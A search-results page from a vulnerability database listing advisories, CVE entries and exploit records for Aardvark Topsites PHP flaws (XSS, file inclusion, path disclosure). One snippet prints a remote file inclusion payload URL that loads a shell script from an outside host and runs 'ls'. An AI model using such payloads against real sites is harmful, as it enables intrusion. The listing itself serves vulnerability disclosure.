Lucene search
K

33 matches found

Packet Storm
Packet Storm
added 2014/10/09 12:0 a.m.435 views

Aardvark Topsites PHP 5.2 Cross Site Scripting / Local File Inclusion

Aardvark Topsites PHP 5.2 Multi Vulnerability ============================================= Author : indoushka Vondor : www.p30vel.ir http://www.aardvarktopsitesphp.com/ http://www.avatic.com/ Dork : My Topsites List - Powered by Aardvark Topsites PHP 5.2.1 ======================================...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.345 views

Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln

No description provided by source. Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: Powered By Aardvark Topsites PHP 4.2.2 Exploit: /sources/join.php?FORMurl=owned&CONFIGcaptcha=1&CONFIGpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.29 views

Aardvark Topsites PHP <= 4.2.2 (lostpw.php) Remote Include Exploit

No description provided by source. !/usr/bin/perl Aardvark Topsites PHP =4.2.2 Remote Command Execution Exploit Copyright c 2006 cijfer cijfer@netti!fi All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ to set your PHP shell...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.15 views

Aardvark Topsites 4.1 PHP Multiple Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/9231/info Multiple vulnerabilities have been identified in the software that include information disclosure, path disclosure, SQL injection, and a plaintext password weakness. Aardvark Topsites PHP version 4.1.0 has been...

7.1AI score
Exploits0
OpenVAS
OpenVAS
added 2010/12/09 12:0 a.m.18 views

Aardvark Topsites PHP 'index.php' Multiple Cross Site Scripting Vulnerabilities

This host is running Aardvark Topsites PHP CMS and is prone to cross site scripting vulnerabilities. OpenVAS Vulnerability Test $Id: gbaardvarktopsitesphpcmsxssvuln.nasl 5676 2017-03-22 16:29:37Z cfi $ Aardvark Topsites PHP 'index.php' Multiple Cross Site Scripting Vulnerabilities Authors: Antu...

4.3CVSS6.4AI score0.01656EPSS
Exploits0References2
OpenVAS
OpenVAS
added 2010/12/09 12:0 a.m.26 views

Aardvark Topsites PHP 'index.php' Multiple Cross Site Scripting Vulnerabilities

Aardvark Topsites PHP CMS is prone to cross site scripting vulnerabilities. SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

4.3CVSS6.3AI score0.01656EPSS
Exploits0References3
Prion
Prion
added 2010/10/27 7:0 p.m.18 views

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in index.php in Aardvark Topsites PHP 5.2.0 and 5.2.1 allow remote attackers to inject arbitrary web script or HTML via the 1 mail, 2 title, 3 u, and 4 url parameters. NOTE: the q parameter is already covered by CVE-2009-2302...

4.3CVSS6AI score0.01734EPSS
Exploits1References3Affected Software1
CVE
CVE
added 2010/10/27 6:0 p.m.56 views

CVE-2010-4097

CVE-2010-4097 concerns Aardvark Topsites PHP versions 5.2.0 and 5.2.1, where multiple XSS flaws in index.php allow remote attackers to inject arbitrary scripts via the mail, title, u, and url parameters (the q parameter is covered by CVE-2009-2302). This Open Web vulnerability set confirms the af...

4.3CVSS5.8AI score0.01656EPSS
Exploits0References3Affected Software1
Cvelist
Cvelist
added 2010/10/27 6:0 p.m.20 views

CVE-2010-4097

Multiple cross-site scripting XSS vulnerabilities in index.php in Aardvark Topsites PHP 5.2.0 and 5.2.1 allow remote attackers to inject arbitrary web script or HTML via the 1 mail, 2 title, 3 u, and 4 url parameters. NOTE: the q parameter is already covered by CVE-2009-2302...

5.7AI score0.01656EPSS
Exploits0References3
NVD
NVD
added 2009/07/02 10:30 a.m.8 views

CVE-2009-2303

index.php in Aardvark Topsites PHP 5.2.1 and earlier allows remote attackers to obtain sensitive information via a negative integer value for the start parameter in a search action, which reveals the installation path in an error message...

5CVSS6.3AI score0.01205EPSS
Exploits0References3
Prion
Prion
added 2009/07/02 10:30 a.m.12 views

Design/Logic Flaw

index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to obtain sensitive information via a nonexistent account name in the u parameter in a rate action, which reveals the installation path in an error message...

5CVSS6.7AI score0.01309EPSS
Exploits1References3Affected Software1
NVD
NVD
added 2009/07/02 10:30 a.m.17 views

CVE-2009-2304

index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to obtain sensitive information via a nonexistent account name in the u parameter in a rate action, which reveals the installation path in an error message...

5CVSS6.2AI score0.01309EPSS
Exploits1References3
Prion
Prion
added 2009/07/02 10:30 a.m.16 views

Cross site scripting

Cross-site scripting XSS vulnerability in index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action. NOTE: it was later reported that 5.2.1 is also affected...

4.3CVSS6AI score0.01734EPSS
Exploits1References6Affected Software1
Cvelist
Cvelist
added 2009/07/02 10:0 a.m.27 views

CVE-2009-2302

Cross-site scripting XSS vulnerability in index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action. NOTE: it was later reported that 5.2.1 is also affected...

5.6AI score0.01734EPSS
Exploits1References6
CVE
CVE
added 2009/07/02 10:0 a.m.40 views

CVE-2009-2303

CVE-2009-2303 affects Aardvark Topsites PHP 5.2.1 and earlier. The vulnerability resides in index.php during a search action, where a negative integer value for the start parameter can trigger an error message that reveals the installation path. This leads to an information disclosure risk (parti...

5CVSS6.4AI score0.01205EPSS
Exploits0References3Affected Software1
Cvelist
Cvelist
added 2009/07/02 10:0 a.m.20 views

CVE-2009-2303

index.php in Aardvark Topsites PHP 5.2.1 and earlier allows remote attackers to obtain sensitive information via a negative integer value for the start parameter in a search action, which reveals the installation path in an error message...

6.3AI score0.01205EPSS
Exploits0References3
CVE
CVE
added 2009/07/02 10:0 a.m.46 views

CVE-2009-2302

CVE-2009-2302 describes a cross-site scripting (XSS) vulnerability in the PHP index.php of Aardvark Topsites PHP. The issue allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action for versions 5.2.0 and earlier, with 5.2.1 also reported as affected. T...

4.3CVSS5.9AI score0.01734EPSS
Exploits1References6Affected Software1
exploitpack
exploitpack
added 2009/05/26 12:0 a.m.16 views

Aardvark Topsites PHP 5.2 - index.php Cross-Site Scripting

Aardvark Topsites PHP 5.2 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/35506/info Aardvark Topsites PHP is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in th...

Exploits0
Exploit DB
Exploit DB
added 2009/05/26 12:0 a.m.44 views

Aardvark Topsites PHP 5.2 - &#039;index.php&#039; Cross-Site Scripting

source: https://www.securityfocus.com/bid/35506/info Aardvark Topsites PHP is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2009/04/29 12:0 a.m.148 views

Reporting new vulnerabilities

Hi SecurityVulns team, I write to report three vulnerabilities that I found in the last version of Aardvark Topsites PHP5.2.1 and older versions. The cause of all of them is the incorrect verification of input parameters. Here are the vulnerabilities: ================== HTML Injection up to 5.2.0...

7.7AI score
Exploits0
Rows per page
Query Builder